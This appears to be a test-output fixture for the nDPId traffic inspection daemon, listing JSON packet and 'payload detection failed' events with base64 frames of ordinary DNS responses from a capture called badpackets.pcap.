00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":21,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":18,"global_ts_msec":1495451114592} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":21,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":18,"global_ts_msec":1495451114592}
00789{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":22,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":384,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":384,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcvvQgADsRTzWcmpGtzLpQ5QA1p0MHJt5xE1qEAAABAAgAAAABA3VubwAAMAABwAwAMAABAAAcIACIAQADCAMBAAG4yfLJ+odI0NYhmvuEYusTX3PMFSgpFuzmz0UAbcsB7BQkNbURzRziXs3Eo+Y4VAvQbBXZ7ZrIhm7e5Kv05B9ITQPXR8mAKN+eP4XS24qX5yxLTJr1BHYcwjbMHD11lKYei8h3x0IL84h+CJR9MkSjpkX65W1xs0ZDKrBsVj+sP8AMADAAAQAAHCABCAEBAwgDAQAB7AsXAeKN3QmGY7+Xpe0mfMtRzSIrdueZqhbVPuuuqzzkGlfKN+qx6PtpXxVkUMnMYiEn3FO6H3aNHnpkDL273LzrNhBMH62l5Tf14gZ7\/YEClmhlbBKDGSaiQipf0qYB+3KlSnlFkNTZQTPpSS2skfRrrwaSrIFrBnPy65VNup0b0nKjYyVw623MNxZMGgFjsX8veogoAKeS"} 00775{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":384,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":384,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcvvQgADsRTzWcmpGtzLpQ5QA1p0MHJt5xE1qEAAABAAgAAAABA3VubwAAMAABwAwAMAABAAAcIACIAQADCAMBAAG4yfLJ+odI0NYhmvuEYusTX3PMFSgpFuzmz0UAbcsB7BQkNbURzRziXs3Eo+Y4VAvQbBXZ7ZrIhm7e5Kv05B9ITQPXR8mAKN+eP4XS24qX5yxLTJr1BHYcwjbMHD11lKYei8h3x0IL84h+CJR9MkSjpkX65W1xs0ZDKrBsVj+sP8AMADAAAQAAHCABCAEBAwgDAQAB7AsXAeKN3QmGY7+Xpe0mfMtRzSIrdueZqhbVPuuuqzzkGlfKN+qx6PtpXxVkUMnMYiEn3FO6H3aNHnpkDL273LzrNhBMH62l5Tf14gZ7\/YEClmhlbBKDGSaiQipf0qYB+3KlSnlFkNTZQTPpSS2skfRrrwaSrIFrBnPy65VNup0b0nKjYyVw623MNxZMGgFjsX8veogoAKeS"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":22,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":350,"global_ts_msec":1495451120530} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":22,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":350,"global_ts_msec":1495451120530}
01296{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":23,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":759,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":759,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcooIgADMRE+aBBg0DzLpQ5QA1SmkInV2uJjOEEAABAAMABAANA3d3dgRuaXN0A2dvdgAAAQABwAwAAQABAAAHCAAEGDiyjMAMAC4AAQAABwgAnAABBwMAAAcIWSp+wlkhOKFNKgRuaXN0A2dvdgBIYUso1Tbe3YPWKI6pKsnK39L0ZR+Wo84lp69g80vFD15mFzrNg7EcUCLsnkMlQJbHqK3QN0QeDzdgWJzEtkF4C3gfcuiYqpNzLzSbOaI8qMLYR3iAIZ82fx0LiQg0fj\/UhXahd9c0eXrYwc69KuT3ZZpBmxsvQGSbA79dTk2IcMAMAC4AAQAABwgAnAABBwMAAAcIWSp+wlkhOKFp9QRuaXN0A2dvdgB2VIO3XeASYXoMskLY5BdTHuMWk0C0lo9NqfSeSNpiocAUe4wjG0pSKGWTvO9v14o3ES1dQF\/lRDDzLvndMmBTSk8OUc6DZkYg\/xkANFcnfu1rJX71cI8qZoMAtFPuJG+OdrjwY3UO+gUW81AuHH3Rvj37sLrgU6NYwdvHL8cSF8D0AAIAAQAABwgABgNnZWHA9MD0AAIAAQAABwgABgNiZWHA9MD0AC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpNKgRuaXN0A2dvdgB\/AugCl6Rz+sTdMBLd\/b9WzbTmwtSJRElGSiFaNkIXGL85DwZ8CN5XIraessCeREIcUwZxVSCZqTN+jQfSqvs0RCCsELGmZy1\/6te8q\/BHGZ6r5Yfp\/FixyK0YEzCx9kE6yxKwCHgAiZ9RYjXpdk7jwKD9iHCh9psgrmi4EqWisMHAAC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpp9QRuaXN0A2dvdgClTY7jIx2EAO1rRXMS+rZG5e8+PelDpKXOMRzGWIjrQbBJVXqIaZDLeBgBTWgx3tBkiLlUy1bOdR3MF5sPTTggHRJuEc8rRcMhHY6s0g2zr9CNylE8o5Mcs+HT"} 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":23,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":759,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":759,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcooIgADMRE+aBBg0DzLpQ5QA1SmkInV2uJjOEEAABAAMABAANA3d3dgRuaXN0A2dvdgAAAQABwAwAAQABAAAHCAAEGDiyjMAMAC4AAQAABwgAnAABBwMAAAcIWSp+wlkhOKFNKgRuaXN0A2dvdgBIYUso1Tbe3YPWKI6pKsnK39L0ZR+Wo84lp69g80vFD15mFzrNg7EcUCLsnkMlQJbHqK3QN0QeDzdgWJzEtkF4C3gfcuiYqpNzLzSbOaI8qMLYR3iAIZ82fx0LiQg0fj\/UhXahd9c0eXrYwc69KuT3ZZpBmxsvQGSbA79dTk2IcMAMAC4AAQAABwgAnAABBwMAAAcIWSp+wlkhOKFp9QRuaXN0A2dvdgB2VIO3XeASYXoMskLY5BdTHuMWk0C0lo9NqfSeSNpiocAUe4wjG0pSKGWTvO9v14o3ES1dQF\/lRDDzLvndMmBTSk8OUc6DZkYg\/xkANFcnfu1rJX71cI8qZoMAtFPuJG+OdrjwY3UO+gUW81AuHH3Rvj37sLrgU6NYwdvHL8cSF8D0AAIAAQAABwgABgNnZWHA9MD0AAIAAQAABwgABgNiZWHA9MD0AC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpNKgRuaXN0A2dvdgB\/AugCl6Rz+sTdMBLd\/b9WzbTmwtSJRElGSiFaNkIXGL85DwZ8CN5XIraessCeREIcUwZxVSCZqTN+jQfSqvs0RCCsELGmZy1\/6te8q\/BHGZ6r5Yfp\/FixyK0YEzCx9kE6yxKwCHgAiZ9RYjXpdk7jwKD9iHCh9psgrmi4EqWisMHAAC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpp9QRuaXN0A2dvdgClTY7jIx2EAO1rRXMS+rZG5e8+PelDpKXOMRzGWIjrQbBJVXqIaZDLeBgBTWgx3tBkiLlUy1bOdR3MF5sPTTggHRJuEc8rRcMhHY6s0g2zr9CNylE8o5Mcs+HT"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":23,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":725,"global_ts_msec":1495451125221} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":23,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":725,"global_ts_msec":1495451125221}
00616{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":24,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":253,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFKAXcix5gAPYRtKqAcIEPzLpQ5QA1PwIGo6sTVh2EEAABAAEABgAPBmdpdmluZwlwcmluY2V0b24DZWR1AAABAAEGZ2l2aW5nCVByaW5jZXRvbgNFRFUAAAEAAQAAqMAABEtlhE3ALQACAAEAAqMAAA0FYWRuczEEdWNzY8AdwC0AAgABAAKjAAAYBWF1dGgyA2Rucwhjb2dlbnRjbwNjb20AwC0AAgABAAKjAAALCGRpa2FoYmxlwC3ALQACAAEAAqMAAAgFYXV0aDHAdcAtAAIAAQACowAACAVhZG5zMsBcwC0AAgABAAKjAAAGAw=="} 00602{"packet_event_id":1,"packet_event_name":"packet","packet_id":24,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":253,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFKAXcix5gAPYRtKqAcIEPzLpQ5QA1PwIGo6sTVh2EEAABAAEABgAPBmdpdmluZwlwcmluY2V0b24DZWR1AAABAAEGZ2l2aW5nCVByaW5jZXRvbgNFRFUAAAEAAQAAqMAABEtlhE3ALQACAAEAAqMAAA0FYWRuczEEdWNzY8AdwC0AAgABAAKjAAAYBWF1dGgyA2Rucwhjb2dlbnRjbwNjb20AwC0AAgABAAKjAAALCGRpa2FoYmxlwC3ALQACAAEAAqMAAAgFYXV0aDHAdcAtAAIAAQACowAACAVhZG5zMsBcwC0AAgABAAKjAAAGAw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":24,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":219,"global_ts_msec":1495451143643} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":24,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":219,"global_ts_msec":1495451143643}
00370{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":25,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":70,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc8l4gADcRrZWY2AelzLpQ5QA1QFwLtGqgHLSEAAABAAIABQAQAnNhBHd3dzQDaXJzA2dvdg=="} 00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":70,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc8l4gADcRrZWY2AelzLpQ5QA1QFwLtGqgHLSEAAABAAIABQAQAnNhBHd3dzQDaXJzA2dvdg=="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":25,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":36,"global_ts_msec":1495451144693} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":25,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":36,"global_ts_msec":1495451144693}
01421{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":26,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":850,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":850,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcp70gADMRDquBBg0DzLpQ5QA1tIMI+JbQPi6EEAABAAMABQANBG5pc3QEdGltZQNnb3YAAAEAAcAMAAUAAQAABwgAEAR0aW1lA2dsYgRuaXN0wBbADAAuAAEAAAcIAJwABQcDAAAHCFkqyCtZIYRnjJkEdGltZQNnb3YAqr9jxTZXybcXnuCzjwFwvmFI+Ze7+m+rSWmDSn1MGMydCqolZgbVKJgNgG1S4zXIK8pdBL562Arwa55agW7HdTeBY84CmqWupq562AYDen9j\/fcu4j8dUrr0Np5qd65iLfnFlqyyY1lwhO5MLHlBGeFoLloqXXTeoUcgip7f3svADAAuAAEAAAcIAJwABQcDAAAHCFkqyCtZIYRno1UEdGltZQNnb3YA1mVm7+rmIQsKL0j8gZgmJcKynM3ZMQd2XdMAq44akLYox+waENon7a\/NmZaeWbIVHTDHZNuDBA9d3DqfTwZmq6tNJfokzKjG5g+KihH2Xa4Kp9wiLwRswtv6QxM2Qg5XcrAKw8x7jBKYqECsGcjybhwp76K9osOWdUlx9tS+dNnAMAACAAEAAAcIAAcEZ3RtZ8A0wDAAAgABAAAHCAAHBGd0bWLANCBWQ0xEQlZEM045OVFSSElHTFY5UVFBRkUxRFU3UEJOTMA0ADIAAQAAASwAHwEAAAoCf28U+zG4nx40du+nR\/TU4M0oy+4k6+cAASDBsQAuAAEAAAEsAJwAMgcDAAABLFkqrVZZIWt\/TSoEbmlzdANnb3YAin87ubwH5bbudTk+e+xAakiTfHLL5BNm7U1T7Tp5nwZ+YiMNjXALwdG0Rzv41sO6d6JzvqGjEvTLlZHOxMvzh5qOOCQ5pTDJOeqLshIcRoXLTP+W5JHoo22\/LNWmDP4Sejibo\/ExdMmbbKksTx5XkoOuibEJlXT+CgT9AZmeMRTBsQAuAAEAAAEsAJwAMgcDAAABLFkqrVZZIWt\/afUEbmlzdANnb3YACfYO\/o1yNCznWcx+k3iT2eRehKQYOK+FNHFc5RmDgi0nh2MAeCXjMinIJ79YtQqPSh00E\/qkzv0dT8zKvlO44sNJMgS8x9irpUURGpmdOjra2Peut2w6hiAF+w=="} 01407{"packet_event_id":1,"packet_event_name":"packet","packet_id":26,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":850,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":850,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcp70gADMRDquBBg0DzLpQ5QA1tIMI+JbQPi6EEAABAAMABQANBG5pc3QEdGltZQNnb3YAAAEAAcAMAAUAAQAABwgAEAR0aW1lA2dsYgRuaXN0wBbADAAuAAEAAAcIAJwABQcDAAAHCFkqyCtZIYRnjJkEdGltZQNnb3YAqr9jxTZXybcXnuCzjwFwvmFI+Ze7+m+rSWmDSn1MGMydCqolZgbVKJgNgG1S4zXIK8pdBL562Arwa55agW7HdTeBY84CmqWupq562AYDen9j\/fcu4j8dUrr0Np5qd65iLfnFlqyyY1lwhO5MLHlBGeFoLloqXXTeoUcgip7f3svADAAuAAEAAAcIAJwABQcDAAAHCFkqyCtZIYRno1UEdGltZQNnb3YA1mVm7+rmIQsKL0j8gZgmJcKynM3ZMQd2XdMAq44akLYox+waENon7a\/NmZaeWbIVHTDHZNuDBA9d3DqfTwZmq6tNJfokzKjG5g+KihH2Xa4Kp9wiLwRswtv6QxM2Qg5XcrAKw8x7jBKYqECsGcjybhwp76K9osOWdUlx9tS+dNnAMAACAAEAAAcIAAcEZ3RtZ8A0wDAAAgABAAAHCAAHBGd0bWLANCBWQ0xEQlZEM045OVFSSElHTFY5UVFBRkUxRFU3UEJOTMA0ADIAAQAAASwAHwEAAAoCf28U+zG4nx40du+nR\/TU4M0oy+4k6+cAASDBsQAuAAEAAAEsAJwAMgcDAAABLFkqrVZZIWt\/TSoEbmlzdANnb3YAin87ubwH5bbudTk+e+xAakiTfHLL5BNm7U1T7Tp5nwZ+YiMNjXALwdG0Rzv41sO6d6JzvqGjEvTLlZHOxMvzh5qOOCQ5pTDJOeqLshIcRoXLTP+W5JHoo22\/LNWmDP4Sejibo\/ExdMmbbKksTx5XkoOuibEJlXT+CgT9AZmeMRTBsQAuAAEAAAEsAJwAMgcDAAABLFkqrVZZIWt\/afUEbmlzdANnb3YACfYO\/o1yNCznWcx+k3iT2eRehKQYOK+FNHFc5RmDgi0nh2MAeCXjMinIJ79YtQqPSh00E\/qkzv0dT8zKvlO44sNJMgS8x9irpUURGpmdOjra2Peut2w6hiAF+w=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":26,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":816,"global_ts_msec":1495451150025} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":26,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":816,"global_ts_msec":1495451150025}
01403{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":27,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":830,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":830,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcZ2IgADgRNxXOg9J2zLpQ5QA17oYI5FghcmaEEAABAAMABgANBnN1cnZleQhzYWZlbGl0ZQNjb20AAAEAAcAMAAEAAQAAcIAABM6D1BvADAAuAAEAAHCAAKAAAQUDAABwgFknjltZIkdgNvwIc2FmZWxpdGUDY29tAHe+sxe671rWzIUuSmcuIX5JDt2N6FBy\/TemnpDPfETG94sVtxgFhyH+9XDJ8vfBDApGjbQsaNpmhYgJ2jGuM6aa11KsYrpTFxQi3Mq4Mwmb85sg1M7tWwMA\/a9WEJvxthxxgFLD9e7N14XoZuciOXyDRzakdNxJe0xON4TdbMVJwAwALgABAABwgACgAAEFAwAAcIBZJ45bWSJHYFgXCHNhZmVsaXRlA2NvbQDY7GqPPxR3njuOxu6CCj1boxBl0v+KT3lL29Er72LdcsNtFbp2T5f6Lq+bUDJ6aGZ\/GGcJlbZVeSixgLiHv\/3WIrKbFRcxzmntMnI1WXDaq+hOKYUph2hgpvcyTFEbaygdhl5BdaaPauPAfweczJEJCc6TxoWZ0SzqEG1+NouhyMD\/AAIAAQAAcIAABwRuczAzwP\/A\/wACAAEAAHCAAAcEbnMwMcD\/wP8AAgABAABwgAAHBG5zMDLA\/8D\/AAIAAQAAcIAABwRuczA0wP\/A\/wAuAAEAAHCAAKAAAgUCAABwgFknVclZIgjZNvwIc2FmZWxpdGUDY29tAE+K9vCahuql+Dus\/olbzgxR6+xtIAxjgCV7w4P+TDgF96\/wvufu2LlMtgwWwEYPqWlh\/QSV3c3y2mgUeKsDgKDUKBPY4oAN1Ii5SdYXKnxedkDm6CDq2YBIJ\/f3K2Jens9\/DIVOgUFp+Zi9a7TtLhmA1IAcJwnXvflL7avBNhUUwfcALgABAABwgACgAAIFAgAAcIBZJ1XJWSII2VgXCHNhZmVsaXRlA2NvbQDFMtAOhXQ\/tcn8Bg0YsK0LCXQz9eeItGf3CI8d+ppJ3a1qxqTbsYvEPqKVPVXIPiYJ3ICi3zqAg5mc5470ZgSSPw3eDcdgkQ\/2sH6VsrvHw1pWLDtNZPd6cO+KsvNtbbCZ6JY="} 01389{"packet_event_id":1,"packet_event_name":"packet","packet_id":27,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":830,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":830,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcZ2IgADgRNxXOg9J2zLpQ5QA17oYI5FghcmaEEAABAAMABgANBnN1cnZleQhzYWZlbGl0ZQNjb20AAAEAAcAMAAEAAQAAcIAABM6D1BvADAAuAAEAAHCAAKAAAQUDAABwgFknjltZIkdgNvwIc2FmZWxpdGUDY29tAHe+sxe671rWzIUuSmcuIX5JDt2N6FBy\/TemnpDPfETG94sVtxgFhyH+9XDJ8vfBDApGjbQsaNpmhYgJ2jGuM6aa11KsYrpTFxQi3Mq4Mwmb85sg1M7tWwMA\/a9WEJvxthxxgFLD9e7N14XoZuciOXyDRzakdNxJe0xON4TdbMVJwAwALgABAABwgACgAAEFAwAAcIBZJ45bWSJHYFgXCHNhZmVsaXRlA2NvbQDY7GqPPxR3njuOxu6CCj1boxBl0v+KT3lL29Er72LdcsNtFbp2T5f6Lq+bUDJ6aGZ\/GGcJlbZVeSixgLiHv\/3WIrKbFRcxzmntMnI1WXDaq+hOKYUph2hgpvcyTFEbaygdhl5BdaaPauPAfweczJEJCc6TxoWZ0SzqEG1+NouhyMD\/AAIAAQAAcIAABwRuczAzwP\/A\/wACAAEAAHCAAAcEbnMwMcD\/wP8AAgABAABwgAAHBG5zMDLA\/8D\/AAIAAQAAcIAABwRuczA0wP\/A\/wAuAAEAAHCAAKAAAgUCAABwgFknVclZIgjZNvwIc2FmZWxpdGUDY29tAE+K9vCahuql+Dus\/olbzgxR6+xtIAxjgCV7w4P+TDgF96\/wvufu2LlMtgwWwEYPqWlh\/QSV3c3y2mgUeKsDgKDUKBPY4oAN1Ii5SdYXKnxedkDm6CDq2YBIJ\/f3K2Jens9\/DIVOgUFp+Zi9a7TtLhmA1IAcJwnXvflL7avBNhUUwfcALgABAABwgACgAAIFAgAAcIBZJ1XJWSII2VgXCHNhZmVsaXRlA2NvbQDFMtAOhXQ\/tcn8Bg0YsK0LCXQz9eeItGf3CI8d+ppJ3a1qxqTbsYvEPqKVPVXIPiYJ3ICi3zqAg5mc5470ZgSSPw3eDcdgkQ\/2sH6VsrvHw1pWLDtNZPd6cO+KsvNtbbCZ6JY="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":27,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":796,"global_ts_msec":1495451210064} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":27,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":796,"global_ts_msec":1495451210064}
00371{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":28,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":71,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcWZUgADkRzYvQTkcCzLpQ5QA1l\/cF7eAXMAuEEAABAA4ABgABBG1haWwFaG91enoDY29tAAA="} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":28,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":71,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcWZUgADkRzYvQTkcCzLpQ5QA1l\/cF7eAXMAuEEAABAA4ABgABBG1haWwFaG91enoDY29tAAA="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":28,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":37,"global_ts_msec":1495451247437} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":28,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":37,"global_ts_msec":1495451247437}
00472{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":29,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":145,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcSyQgADkRLD3MDfsCzLpQ5QA10qYGN8NYfIeEEAABAAUABgABBWhvdXp6A2NvbQAAEAABwAwAEAABAAk6gABFRGdvb2dsZS1zaXRlLXZlcmlmaWNhdGlvbj0zWEpwSUlaRzJZeUVCWnlPYUs1ZWZrWDFnN21qaFV1aVhqT2xKZw=="} 00458{"packet_event_id":1,"packet_event_name":"packet","packet_id":29,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":145,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcSyQgADkRLD3MDfsCzLpQ5QA10qYGN8NYfIeEEAABAAUABgABBWhvdXp6A2NvbQAAEAABwAwAEAABAAk6gABFRGdvb2dsZS1zaXRlLXZlcmlmaWNhdGlvbj0zWEpwSUlaRzJZeUVCWnlPYUs1ZWZrWDFnN21qaFV1aVhqT2xKZw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":29,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":111,"global_ts_msec":1495451247676} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":29,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":111,"global_ts_msec":1495451247676}
01927{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":30,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1228,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs98gADgR3UqMWiHtzLpQ5QA1U+IKco350KyEEAABAAMABAANB2VkZ2UtcDEBbARub2FhA2dvdgAAHAABwAwAHAABAAAAHgAQJhAAIIgAjAAAAAAAAAAAJMAMABwAAQAAAB4AECYQACCAAIwBAAAAAAAAACTADAAuAAEAAAAeAR4AHAUEAAAAHlkr8xJZIriS1gsBbARub2FhA2dvdgCV6O\/WR3JCSK+C7cZBu3S3X5K0UHxpncAfxFmSgHubPtuQ+ppFRTp+1fHbrUOyCpixD7BN4GSPyT84LF8EMzJbQxH0r2LLAvgtvgpUbYL7Z7w18yYTnE6XGfHtthXb1ZOye1L2hiRfpzbmmXCHOKb6LEYuPXKYSPhX2n+ImdcFypwUqYfMSD9FcjNa3Jo3Oqro2WuMMbD2gPnRfJ8TdXYRG4VNmibFauhfDGpn9UeUfORtwE7m2jOvlQ6Qvy9OpZkqoNE2Vdtt7jPJm2tzt5OKxSjI1XLv3boeUU7hE7UYEXONrZssQLYvDrWx9GDK\/I6MmaWyMYZAJODqzmpC6mevwHoAAgABAAFRgAAHBG5zLWXAfMB6AAIAAQABUYAACAVucy1td8B8wHoAAgABAAFRgAAIBW5zLW53wHzAegAuAAEAAVGAAR4AAgUDAAFRgFkr8xJZIriS1gsBbARub2FhA2dvdgAeLq4NmnVkcNxQ2ECZHAEvCMi5MZYEL8edA7YVxsb2UBGFIEGs\/0MCPjY5njGkf1suVTZtcwyT75u2gFjZgWxP1+c7rm4cmvpvBe+wC0vSebZWwrbWCerbFqwFr8WbzPO2CxG0Zn8pbBKC9uM1kn0tU08OZWkEPnxTJXMcLAZSYKzHnM3Abd9+nCKn5iCnhESUxIPjqzi3TtF47AxxSw8oSy\/22YcIyG5RxzRRDhaTIGZj9gjcsM8kyra2eumMo4lRPXVhwaJ6DQF2GVKV8FslkU9\/qAyzckJZU+4ClRBUn7ZyYZlZnrFBAgj7Zmr2QS9x22hcQerFh+735VmloZaXwZIAAQABAAFRgAAEjFoh7cGSABwAAQABUYAAECYQACCAAIwAAAAAAAAAAjfBpQABAAEAAVGAAASMrBHtwaUAHAABAAFRgAAQJhAAIIgAjAAAAAAAAAACN8G5AAEAAQABUYAABKE3IALBuQAcAAEAAVGAABAmEAAgjACMAAAAAAAAAAACwZIALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AB08bt6E7ohbhYgi6U5fzCvPQTfSQRo3ylVGQBd4GQioTMMd+BhUrSx1nl58nNI6c+qAd1CqFmFqiM5ebi5pE1XQEztOcBoUZF5qERb6hyUOPUUPqQUzb4737GY7eLMVhWgV+nXDO9WAuWyFdvNYRSLJ60ie\/UEooUgR4nksvbeWExpReSwiYozRFhByWMQyA9TM2vrVynTVyVh25EIUMETyShl\/dY6oBT5c+IZn43u+z67SmlCfIeXgKTB\/oGjV7DRb81d5wfupBlV79lVlV1T1yN18zBWvAih22KxRneyyeH+TxQe9uSQgcU0OCnhDrgRNFl1ahPVaCtbmKAeDwCvBkgAuAAEAAVGAAQ=="} 